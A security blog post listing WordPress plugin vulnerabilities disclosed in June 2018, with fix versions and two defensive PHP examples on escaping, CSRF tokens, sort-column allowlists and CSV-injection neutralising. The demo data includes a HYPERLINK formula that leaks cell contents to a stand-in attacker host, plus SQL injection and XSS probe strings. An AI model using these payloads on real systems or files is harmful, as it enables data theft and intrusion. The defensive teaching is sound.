
WP Security: 11 plugin vulnerabilities in June 2018


For your WP security, here are the plugin vulnerabilities disclosed in June 2018 and the versions that fix them:

  1. Redirection
    • Authenticated Local File Inclusion reported by Ryan (Dewhurst Security). Arbitrary code execution via file inclusion: Redirection lets an administrator include any PHP file on the filesystem. Anyone logged in as an administrator can use the plugin's setup page to run arbitrary code and completely compromise the system. The plugin uses external input to construct a pathname that is meant to identify a file under a restricted parent directory, but does not neutralise special elements such as ../ in that pathname, so the path can resolve to a location outside the restricted directory (path traversal). Administrator credentials are required, so the practical risk is a compromised or malicious admin account turning into server-side code execution.
      • immediately upgrade to version 2.8 to fix the vulnerability

  2. Tooltipy (tooltips for WP)
    • Unauthenticated Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). Reflected XSS in Tooltipy (tooltips for WP) could allow anybody to do almost anything an admin can. Tooltipy contains reflected XSS in the [kttg_glossary] shortcode, so an admin user's browser can be hijacked by anybody who gets them to open a crafted link; the hijacked browser can then do almost anything the admin can normally do. The plugin does not neutralise, or incorrectly neutralises, user-controllable input before placing it in a web page served to other users.
    • Cross-Site Request Forgery (CSRF) reported by Ryan (Dewhurst Security). CSRF in Tooltipy's "KTTG Converter" feature allows anybody who can convince an admin to follow a link to duplicate posts. The published PoC duplicates every post with post_type post. The most obvious malicious use is filling up a disk or database quota, which can lead to denial of service or other issues.
      • immediately upgrade to version 5.1 to fix both vulnerabilities

  3. Pie Register
    • Authenticated Blind SQL Injection reported by Ryan (Dewhurst Security). SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.
      • immediately upgrade to version 3.0.10 to fix the vulnerability

  4. Our only security is our ability to change. ~ John Lilly

  5. Ultimate Form Builder Lite
    • Multiple Vulnerabilities reported by Ryan (Dewhurst Security). Ultimate Form Builder Lite before 1.3.8 contains an SQL injection vulnerability and a Cross-Site Scripting vulnerability. The Cross-Site Scripting vulnerability lets an attacker construct a URL that contains malicious JavaScript code; if the administrator of the site opens such a URL, the attacker's code executes in the admin's browser with the admin's unrestricted access to the WordPress site in question.
      • immediately upgrade to version 1.3.8 to fix the vulnerability
      • Consider owl CONTACTS as a more secure replacement candidate.

  6. Advanced Order Export For WooCommerce
    • CSV Injection reported by Ryan (Dewhurst Security). "Advanced Order Export For WooCommerce" (v1.5.4 and before) is vulnerable to CSV Injection: values taken from order data are written to the exported file unescaped, so a cell starting with a character such as = or @ is evaluated as a formula when the export is opened in a spreadsheet application.
      • immediately upgrade to version 1.5.5 to fix the vulnerability

  7. WordPress Comments Import & Export
    • CSV Injection reported by Ryan (Dewhurst Security). The plugin “WordPress Comments Import & Export” for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.
      • immediately upgrade to version 2.0.5 to fix the vulnerability

  8. At the end of the day, the goals are simple: safety and security. ~ Jodi Rell

  9. Open Graph for Facebook, Google+ and Twitter Card Tags
    • Authenticated Reflected XSS reported by hakluke. "Open Graph for Facebook, Google+ and Twitter Card Tags" has a reflected XSS vulnerability in the wd_fb_og_error parameter of a GET request when editing a post. It can be exploited by tricking an authenticated WordPress administrator into clicking a malicious link.
      • immediately upgrade to version 2.2.4.1 to fix the vulnerability

  10. iThemes Security
    • Authenticated SQL Injection reported by Çlirim Emini (https://www.sentry.co.com/). iThemes Security (better-wp-security) before 7.0.3 allows time-based blind SQL injection via the logs page: the orderby parameter is concatenated into the query because the backend variable $sort_by_column is not escaped. Privileges required: administrator.
      • immediately upgrade to version 7.0.3 to fix the vulnerability

  11. Email Subscribers & Newsletters
    • Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). A cross-site scripting vulnerability in Email Subscribers & Newsletters versions prior to 3.5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
      • immediately upgrade to version 3.5.0 to fix the vulnerability

  12. Site Reviews
    • Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). Cross-site scripting vulnerability in Site Reviews versions prior to 2.15.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
      • immediately upgrade to version 2.15.3 to fix the vulnerability
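Items 2, 9 and 10 are three common plugin mistakes on one admin page: user input echoed into the page unescaped, a state-changing action with no request token, and a user-chosen sort column dropped into ORDER BY. The following plain-PHP handler is an added example written for this post, not code from Tooltipy, the Open Graph plugin or iThemes Security; the handle() function, the SORTABLE map, the posts table and the request parameters are hypothetical, and the WordPress functions that do the same job are named in the comments.

```php
<?php
// Added example, not code from Tooltipy, Open Graph or iThemes Security.
// A hypothetical admin "list" handler in plain PHP showing the three defences
// those entries lack: output encoding (reflected XSS), a CSRF token on the
// state-changing action, and an allowlisted ORDER BY column. WordPress
// equivalents are named in comments; the plain-PHP forms run here.
declare(strict_types=1);

// Map of user-visible sort keys to real column names. Anything not in the map
// falls back to the default, so $_GET['orderby'] never reaches the SQL string.
const SORTABLE = ['date' => 'created_at', 'title' => 'post_title', 'hits' => 'hit_count'];

function build_order_by(?string $orderby, ?string $order): string
{
    // Vulnerable form: "ORDER BY " . $_GET['orderby']  (time-based blind SQLi)
    $key    = (string) $orderby;
    $column = array_key_exists($key, SORTABLE) ? SORTABLE[$key] : SORTABLE['date'];
    $dir    = strtoupper((string) $order) === 'ASC' ? 'ASC' : 'DESC';
    return "ORDER BY {$column} {$dir}";
}

// Output encoding: WordPress has esc_html()/esc_attr(); plain PHP uses
// htmlspecialchars with ENT_QUOTES so the value is inert in text and attributes.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// CSRF: a per-session random token checked on every state-changing request.
// WordPress: wp_nonce_field() in the form, check_admin_referer() in the handler.
function csrf_token(array &$session): string
{
    return $session['csrf'] ??= bin2hex(random_bytes(32));
}

function csrf_valid(array $session, ?string $submitted): bool
{
    return isset($session['csrf'], $submitted)
        && hash_equals($session['csrf'], $submitted);   // constant-time compare
}

function handle(array $get, array $post, array &$session): string
{
    $out = '';
    // State change (e.g. "convert/duplicate posts") only with a valid token.
    if (isset($post['action'])) {
        $out .= csrf_valid($session, $post['_token'] ?? null)
            ? "action {$post['action']} performed\n"
            : "rejected: missing or bad CSRF token\n";
    }
    // A message reflected into the page (cf. the wd_fb_og_error parameter).
    if (isset($get['error'])) {
        $out .= '<p class="error">' . e($get['error']) . "</p>\n";
    }
    $out .= 'SELECT id, post_title FROM posts '
        . build_order_by($get['orderby'] ?? null, $get['order'] ?? null) . "\n";
    $out .= '<input type="hidden" name="_token" value="' . e(csrf_token($session)) . '">' . "\n";
    return $out;
}

// Constructed requests: a forged POST without a token, then a reflected XSS
// and SQLi attempt in GET parameters.
$session = [];
echo handle([], ['action' => 'duplicate_posts'], $session);
echo handle(
    ['error' => '<script>alert(1)</script>', 'orderby' => 'id) AND SLEEP(5)-- ', 'order' => 'asc'],
    [],
    $session
);
```

Running it prints a rejected action (no token), an escaped error message and a query whose ORDER BY uses created_at rather than the injected text. In a real plugin the WordPress helpers are the right tools: esc_html()/esc_attr() for output, wp_nonce_field() and check_admin_referer() for the token, and an allowlist for the column name, since value placeholders in a prepared statement cannot stand in for an identifier.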
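Items 6 and 7 name CSV Injection without saying what it is. The following is an added example written for this post, not code from either plugin: a small exporter that neutralises formula-looking cells before writing them with fputcsv(). The csv_neutralise() and export_csv() functions and the order rows are constructed for the demonstration; the payload shown is the well-known HYPERLINK trick used to leak cell contents to an attacker's server.

```php
<?php
// Added example, not code from either exporter plugin. A CSV cell beginning
// with = + - @ (or a tab or carriage return) is evaluated as a formula when
// the export is opened in Excel or LibreOffice, so an attacker who can put
//   =HYPERLINK("http://attacker.example/?"&A1;"click")
// into an order note or comment gets a formula run on the admin's machine
// when the file is opened. Neutralising those cells on export is the fix;
// this is a plain-PHP demonstration of it.
declare(strict_types=1);

function csv_neutralise(string $cell): string
{
    if ($cell === '' || is_numeric($cell)) {
        return $cell;                        // "-5" is a number, not a formula
    }
    if (strpos("=+-@\t\r", $cell[0]) !== false) {
        // A leading apostrophe makes the spreadsheet treat the cell as text.
        return "'" . $cell;
    }
    return $cell;
}

function export_csv(array $rows): string
{
    $fh = fopen('php://memory', 'w+');
    foreach ($rows as $row) {
        $fields = array_map('csv_neutralise', array_map('strval', $row));
        // fputcsv quotes fields containing delimiters, quotes or newlines;
        // the empty escape argument disables PHP's legacy backslash escaping.
        fputcsv($fh, $fields, ',', '"', '');
    }
    rewind($fh);
    return stream_get_contents($fh);
}

// Constructed export with one malicious note and one legitimate negative total.
$rows = [
    ['order_id', 'customer_note', 'total'],
    [1001, '=HYPERLINK("http://attacker.example/?"&A1;"click")', 19.99],
    [1002, '@SUM(A1:A9)', -5],
    [1003, 'plain note, with comma', 0],
];
echo export_csv($rows);
```

The apostrophe prefix is the usual recommendation; it stays visible in the cell in some viewers, which is the acceptable cost. Numeric strings are passed through so a legitimate negative total is not mangled, and fputcsv() takes care of quoting fields that contain delimiters or quotes.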

Protect your WordPress: BEFORE IT’S TOO LATE! You will also protect your customers, your reputation and your online business!
